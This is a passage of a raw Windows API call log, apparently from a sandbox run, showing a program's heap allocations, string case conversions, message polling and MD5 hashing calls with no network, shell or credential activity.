(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0253.959] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0253.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.960] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0253.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.961] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.961] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.961] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.961] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.961] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.962] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.962] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.962] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.962] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.962] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.963] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.963] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.963] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.963] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.963] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.964] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.964] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.964] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.964] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.964] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.965] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.965] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.965] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.966] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.967] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.967] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.967] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.967] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.967] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.968] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0253.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.971] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0253.972] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.972] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0253.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0253.973] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.973] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.973] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.973] CryptHashData (hHash=0xaa58a0, pbData=0x24b1788, dwDataLen=0x3, dwFlags=0x1) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.974] HeapFree (in: 